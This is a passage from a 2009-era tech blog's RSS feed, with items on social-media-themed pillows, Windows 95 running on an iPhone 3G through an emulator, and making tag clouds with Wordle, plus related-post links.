href="http://viralpatel.net/blogs/2009/08/what-if-facebook-is-country.html" title="What if the Facebook is a Country?">What if the Facebook is a Country?</a></li><li><a href="http://viralpatel.net/blogs/2009/08/display-twitter-user-image-on-your-blogwebsite-in-2-minutes.html" title="Display Twitter User Image on your Blog/Website in 2 Minutes">Display Twitter User Image on your Blog/Website in 2 Minutes</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2009/08/if-twitter-consisted-of-100-people.html/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Pillows for you: Try these Social Media Pillow</title><link>http://viralpatel.net/blogs/2009/08/pillows-try-social-media-pillow.html</link> <comments>http://viralpatel.net/blogs/2009/08/pillows-try-social-media-pillow.html#comments</comments> <pubDate>Tue, 11 Aug 2009 14:26:25 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[Web 2.0]]></category> <category><![CDATA[digg]]></category> <category><![CDATA[facebook]]></category> <category><![CDATA[social media]]></category> <category><![CDATA[tech stories]]></category> <category><![CDATA[twitter]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1642</guid> <description><![CDATA[You will find those Social Media buttons on most of the blogs and websites you visit these days. Even we have one such button panel at the end of each post which lets user share the story with their favorite social website. But guess what, Chicago-based Twitter user @craftsquatch has created series of pillows hand [...]]]></description> <content:encoded><![CDATA[<p>You will find those Social Media buttons on most of the blogs and websites you visit these days. Even we have one such button panel at the end of each post which lets user share the story with their favorite social website.</p><p>But guess what, Chicago-based Twitter user <strong>@craftsquatch</strong> has created series of pillows hand decorated to represent your favorite social networking sites, might be what you need. , the pillows produced include Flickr, Reddit, Digg (Digg), the Twitter “t”, the Fail Whale, the Twitter bird, FriendFeed (FriendFeed), Tumblr (Tumblr), Facebook (Facebook), MySpace (MySpace) and more.</p><p>The pillows are available for $18 each in the <a rel="nofollow" target="_new" href="http://www.etsy.com/shop.php?user_id=6956228">Craftsquatch Etsy store</a>.</p><h2>Social Media Pillows: Photo Gallery</h2><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/socialpillows1.jpg" class="aligncenter" /></p><p><img src="http://img.viralpatel.net/2009/08/socialpillows2.gif" alt="socialpillows2" title="socialpillows2" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/socialpillows3.gif" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/socialpillows5.gif" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/failwhalepillow.jpg" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/diggpillow.jpg" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/tumblrpillow.jpg" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/flickrpillow.jpg" class="aligncenter" /></p><p><img alt="" src="http://ec.mashable.com/wp-content/uploads/2009/08/rsspillow.jpg" class="aligncenter" /></p><p>Photo courtesy: <a rel="nofollow" target="_new" href="http://mashable.com/2009/08/11/social-media-pillows/">Mashable</a></p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2010/02/did-twitter-forget-to-update-copyright-year.html" title="Did Twitter Forget to Update its Copyright Year?">Did Twitter Forget to Update its Copyright Year?</a></li><li><a href="http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html" title="Google Wave has its own Fail Whale">Google Wave has its own Fail Whale</a></li><li><a href="http://viralpatel.net/blogs/2009/08/what-if-facebook-is-country.html" title="What if the Facebook is a Country?">What if the Facebook is a Country?</a></li><li><a href="http://viralpatel.net/blogs/2009/08/if-twitter-consisted-of-100-people.html" title="If Twitter Consisted of 100 People!">If Twitter Consisted of 100 People!</a></li><li><a href="http://viralpatel.net/blogs/2009/07/precrime-minority-report-real-facebook-england.html" title="Pre-crime &#038; Minority Report turns real through Facebook in England">Pre-crime &#038; Minority Report turns real through Facebook in England</a></li><li><a href="http://viralpatel.net/blogs/2009/06/facebook-vanity-urls-landrush-starts-june-13-midnight.html" title="Facebook Vanity URLs Landrush to starts on June 13 Midnight">Facebook Vanity URLs Landrush to starts on June 13 Midnight</a></li><li><a href="http://viralpatel.net/blogs/2009/04/breaking-news-twitter-hit-by-stalkdaily-virus.html" title="Breaking News: Twitter hit by StalkDaily Virus">Breaking News: Twitter hit by StalkDaily Virus</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2009/08/pillows-try-social-media-pillow.html/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Windows 95 on iPhone 3G!!</title><link>http://viralpatel.net/blogs/2009/07/windows-95-on-iphone-3g.html</link> <comments>http://viralpatel.net/blogs/2009/07/windows-95-on-iphone-3g.html#comments</comments> <pubDate>Tue, 14 Jul 2009 14:41:11 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[News]]></category> <category><![CDATA[iphone]]></category> <category><![CDATA[iphone 3g]]></category> <category><![CDATA[tech stories]]></category> <category><![CDATA[windows]]></category> <category><![CDATA[windows xp]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1553</guid> <description><![CDATA[In this new world of smart phones, 3gs, web 2(3).0, twitter, facebook etc we hardly remember the old legacy softwares that we used in early days of technological evolution of computer world. But people come up with some strange, weird or you can say innovative idea. Like this one; the Developers of iSoft team ran [...]]]></description> <content:encoded><![CDATA[<p><img src="http://img.viralpatel.net/2009/07/windows-95-iphone.png" alt="windows-95-iphone" title="windows-95-iphone" width="480" height="320" class="aligncenter size-full wp-image-1554" /><br /> In this new world of smart phones, 3gs, web 2(3).0, twitter, facebook etc we hardly remember the old legacy softwares that we used in early days of technological evolution of computer world. But people come up with some strange, weird or you can say innovative idea. Like this one; the Developers of <a href="http://isoftcom.com/" rel="nofollow" target="_new">iSoft team</a> ran <strong>windows 95 on iPhone</strong>, its done with help of <a rel="nofollow" target="_new" href="http://bochs.sourceforge.net/">Bochs emulator</a> and original win 95 image.</p><p>Few screen shots below <img src='http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br /> <img alt="" src="http://goodiphone.com/files/winscreens/screen5.PNG" class="aligncenter" width="480" height="320" /></p><p><img alt="" src="http://goodiphone.com/files/winscreens/screen4.PNG" class="aligncenter" width="480" height="320" /></p><p><img alt="" src="http://goodiphone.com/files/winscreens/screen2.PNG" class="aligncenter" width="480" height="320" /></p><p><img alt="" src="http://goodiphone.com/files/winscreens/screen3.PNG" class="aligncenter" width="480" height="320" /></p><p>Image Source: <a href="http://goodiphone.com/2009/07/windows-95-on-iphone/" rel="nofollow" target="_new">Goodiphone</a></p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2009/07/unlock-iphone-3gs-4-steps.html" title="Unlock your iPhone 3GS in 4 simple steps">Unlock your iPhone 3GS in 4 simple steps</a></li><li><a href="http://viralpatel.net/blogs/2009/05/hiding-an-extension.html" title="Hiding an Extension">Hiding an Extension</a></li><li><a href="http://viralpatel.net/blogs/2009/01/how-to-reinstall-windows-after-installing-linux.html" title="How to reinstall windows after installing linux">How to reinstall windows after installing linux</a></li><li><a href="http://viralpatel.net/blogs/2008/11/windows-xp-with-vista.html" title="Installing Windows XP with Vista">Installing Windows XP with Vista</a></li><li><a href="http://viralpatel.net/blogs/2011/07/google-plus-homepage-redirect.html" title="Redirect your homepage /+ URL to your Google + profile">Redirect your homepage /+ URL to your Google + profile</a></li><li><a href="http://viralpatel.net/blogs/2010/06/say-hello-to-wordpress-3-0.html" title="Say Hello to WordPress 3.0!">Say Hello to WordPress 3.0!</a></li><li><a href="http://viralpatel.net/blogs/2010/02/did-twitter-forget-to-update-copyright-year.html" title="Did Twitter Forget to Update its Copyright Year?">Did Twitter Forget to Update its Copyright Year?</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2009/07/windows-95-on-iphone-3g.html/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Generate tag cloud using Wordle</title><link>http://viralpatel.net/blogs/2008/12/generate-tag-cloud-using-wordle.html</link> <comments>http://viralpatel.net/blogs/2008/12/generate-tag-cloud-using-wordle.html#comments</comments> <pubDate>Mon, 15 Dec 2008 12:46:45 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[Web 2.0]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=451</guid> <description><![CDATA[Browsing through internet, I came to this wonderful tool called Wordle which generates a tag cloud with different orientation and effects. It takes input as plain text or your blogs/websites rss/atom feed or your sites URL and generate a cool tag cloud of the words that it encounters on your site. You can change the [...]]]></description> <content:encoded><![CDATA[<p>Browsing through internet, I came to this wonderful tool called <a rel="nofollow" target="_new" href="http://www.wordle.net/create"><strong>Wordle</strong></a> which generates a tag cloud with different orientation and effects. It takes input as plain text or your blogs/websites rss/atom feed or your sites URL and generate a cool tag cloud of the words that it encounters on your site. You can change the font and effects on this tag cloud. Also you can remove unwanted words from it.</p><p>I tried several URLs and following are the Wordle generated by this site.</p><h3>VIRALPATEL.NET (My site <img src='http://viralpatel.net/blogs/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> )</h3><p><img border="0" src="http://img.viralpatel.net/2008/12/viralpatel-net-blogs-tag-cloud-wordle.png" alt="" title="viralpatel-net-blogs-tag-cloud-wordle" width="500" height="347" class="alignnone size-full wp-image-455" /></p><h3>SLASHDOT.COM</h3><p><img border="0" src="http://img.viralpatel.net/2008/12/slashdot-tag-cloud-wordle.png" alt="" title="slashdot-tag-cloud-wordle" width="500" height="220" class="alignnone size-full wp-image-456" /></p><h3>TECHCRUNCH.COM</h3><p><img border="0" src="http://img.viralpatel.net/2008/12/techcrunch-tag-cloud-wordle.png" alt="" title="techcrunch-tag-cloud-wordle" width="500" height="443" class="alignnone size-full wp-image-453" /></p><h3>TECHNORATI.COM</h3><p><img border="0" src="http://img.viralpatel.net/2008/12/technorati-tag-cloud-wordle.png" alt="" title="technorati-tag-cloud-wordle" width="500" height="248" class="alignnone size-full wp-image-454" /></p><h3>NEWS.GOOGLE.COM</h3><p><img border="0" src="http://img.viralpatel.net/2008/12/google-news-tag-cloud-wordle.png" alt="" title="google-news-tag-cloud-wordle" width="500" height="272" class="alignnone size-full wp-image-452" /></p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2010/10/introduction-html5-domstorage-api-example.html" title="Introduction to HTML5 DOMStorage API with Example">Introduction to HTML5 DOMStorage API with Example</a></li><li><a href="http://viralpatel.net/blogs/2010/06/facebook-facts-you-didnt-know.html" title="Facebook: Facts you probably didnt know">Facebook: Facts you probably didnt know</a></li><li><a href="http://viralpatel.net/blogs/2010/01/oembed-open-format-web-developers.html" title="oEmbed: An Open Format Every Developer Should Know About">oEmbed: An Open Format Every Developer Should Know About</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html" title="Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary">Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary</a></li><li><a href="http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html" title="Google Wave has its own Fail Whale">Google Wave has its own Fail Whale</a></li><li><a href="http://viralpatel.net/blogs/2009/09/gartners-hype-cycle-special-report-2009.html" title=" Gartner&#8217;s Hype Cycle Special Report for 2009"> Gartner&#8217;s Hype Cycle Special Report for 2009</a></li><li><a href="http://viralpatel.net/blogs/2009/08/what-if-facebook-is-country.html" title="What if the Facebook is a Country?">What if the Facebook is a Country?</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2008/12/generate-tag-cloud-using-wordle.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced

Served from: viralpatel.net @ 2012-02-08 21:04:16 -->
